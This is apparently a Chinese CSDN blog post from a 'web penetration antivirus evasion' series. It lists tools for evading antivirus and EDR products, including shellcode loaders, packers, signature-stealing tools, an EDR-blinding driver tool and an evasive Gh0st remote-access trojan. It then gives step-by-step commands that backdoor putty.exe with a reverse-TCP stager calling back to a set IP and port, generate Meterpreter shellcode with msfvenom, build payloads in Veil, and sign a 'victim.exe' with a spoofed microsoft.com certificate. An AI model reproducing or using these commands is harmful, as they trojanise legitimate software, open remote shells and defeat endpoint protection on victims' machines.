WEB渗透免杀篇-免杀工具全集

标签：WEB exe 免杀全集 EDR shellcode payload

往期文章

WEB渗透免杀篇-加载器免杀-CSDN博客

WEB渗透免杀篇-分块免杀-CSDN博客

WEB渗透免杀篇-Powershell免杀-CSDN博客

WEB渗透免杀篇-Python源码免杀-CSDN博客

WEB渗透免杀篇-C#源码免杀-CSDN博客

WEB渗透免杀篇-MSF+shellcode免杀-CSDN博客

WEB渗透免杀篇-Bypass-AMSI-CSDN博客

工具列表


工具名称	下载地址	工具描述
AV_Evasion_Tool	GitHub - 1y0n/AV_Evasion_Tool: 掩日 - 免杀执行器生成工具	掩日 - 免杀执行器生成工具
ScareCrow	GitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.	自动化生成 EDR 软件 Bypass Payload 的工具,一键化签名免杀
avet	GitHub - govolution/avet: AntiVirus Evasion Tool
AniYa	GitHub - piiperxyz/AniYa: 免杀框架	免杀框架
shellcodeloader	GitHub - knownsec/shellcodeloader: shellcodeloader	shellcode加载器
Themida	需要自己去找资源	加壳工具
SigThief	GitHub - secretsquirrel/SigThief: Stealing Signatures and Making One Invalid Signature at a Time	签名工
ShellQMaker	GitHub - SecurityAnalysts01/ShellcodeLoader at 1ff79fb9e1b9ad4934da88d9db82494d81a851c0	超实用免杀
RealBlindingEDR	GitHub - myzxcg/RealBlindingEDR: Remove AV/EDR Kernel ObRegisterCallbacks、CmRegisterCallback、MiniFilter Callback、PsSetCreateProcessNotifyRoutine Callback、PsSetCreateThreadNotifyRoutine Callback、PsSetLoadImageNotifyRoutine Callback...	利用带有签名驱动程序的任意地址读/写实现：完全盲目或终止或永久关闭 AV/EDR。
Qianji	GitHub - Pizz33/Qianji: 千机-红队免杀木马自动生成器 Bypass defender、火绒、360等国内主流杀软随机加密混淆shellcode快速生成免杀马	千机-红队免杀木马自动生成器
CreateUser	夸克网盘分享	免杀360创建windows用户工具
reshacker	自行获取	主要用于替换图标
upx	GitHub - upx/upx: UPX - the Ultimate Packer for eXecutables	UPX - 用于扩展的终极打包器
Webshell-loader	GitHub - INotGreen/Webshell-loader: ASPX内存执行shellcode,绕过Windows Defender（AV/EDR）	ASPX内存执行shellcode,绕过Windows Defender（AV/EDR）
GobypassAV-shellcode	GitHub - Pizz33/GobypassAV-shellcode: shellcode免杀加载器，使用go实现，免杀bypass火绒、360、核晶、def等主流杀软	免杀shellcode加载器，使用go实现，免杀bypass火绒、360、核晶、def等主流杀软
Gh0st2023	https://github.com/SecurityNo1/Gh0st2023	重写免杀版Gh0st远控、大灰狼远控免杀，目前可免杀360、火绒、腾讯电脑管家等主流杀软。
bypassAV	https://github.com/cseroad/bypassAV	借助Win-PS2EXE项目编写cna脚本方便快速生成免杀可执行文件
在线免杀平台	潮影在线免杀平台	在线免杀平台
AV_Evasion_Tool	GitHub - 1y0n/AV_Evasion_Tool: 掩日 - 免杀执行器生成工具	掩日 - 免杀执行器生成工具用于快速生成免杀的 EXE 可执行文件
ScareCrow	GitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.	自动化生成 EDR 软件 Bypass Payload 的工具,一键化签名免杀
BypassAv-web	GitHub - M-Kings/BypassAv-web: nim一键免杀	梅花K战队写的Nim一键免杀源码使用nim语言进行shellcode加载
SharpThief	GitHub - INotGreen/SharpThief: 一键提取exe的图标、嵌入图标、资源信息、版本信息、修改时间、数字签名，降低程序熵值	一键窃取文件的图标、资源信息、版本信息、修改时间、数字签名，降低程序熵值

Shellter

仅支持32位程序
>apt install shellter
指定一个exe文件

选择payload

the-backdoor-factory

GitHub - secretsquirrel/the-backdoor-factory: Patch PE, ELF, Mach-O binaries with shellcode new version in development, available only to sponsors

查看是否支持捆绑

>python backdoor.py -f /root/Desktop/putty.exe -S

查看此文件支持哪些payload

>python backdoor.py -f /root/Desktop/putty.exe -s show

reverse_shell_tcp_inline对应msf set payload windows/meterpreter/reverse_tcp meterpreter_reverse_https_threaded应msf set payload windows/meterpreter/reverse_https iat_reverse_tcp_stager_threaded修复IAT user_supplied_shellcode_threaded自定义payload 参数 -s 指定payload -H 回连地址 -P 回连端口 -J 多代码裂缝注入

>python backdoor.py -f ~/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.0.108 -P 12138 -J -o payload.exe

后门生成在backdoored目录或生成payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -i 5 -f raw -o shellcode.c

自定义

>python backdoor.py -f /root/putty.exe -s user_supplied_shellcode_threaded -U /root/shellcode.c  -o payload2.exe

Veil

>use 1选择evasion模块
>list查看可用payload
>use 7 选择c格式的payload
>set LHOST/LPORT设置回连IP和端口
>generate生成

直接生成的exe可能会被查杀，目前可过360，不能过火绒
使用minGW-w64编译C文件
>gcc -o vel.exe veil.c -l ws2_32

捆绑器

https://github.com/Yihsiwei/GoFileBinder

zirikatu

carboncopy

https://github.com/paranoidninja/CarbonCopy
可以创建任何网站的证书并签署
并且生成可执行文件的工具。适用于 Windows 和 Linux
>python3 CarbonCopy.py www.microsoft.com 443 victim.exe signed-victim.exe

标签：WEB,exe,免杀,全集,EDR,shellcode,payload
From： https://blog.csdn.net/qq_59468567/article/details/141331954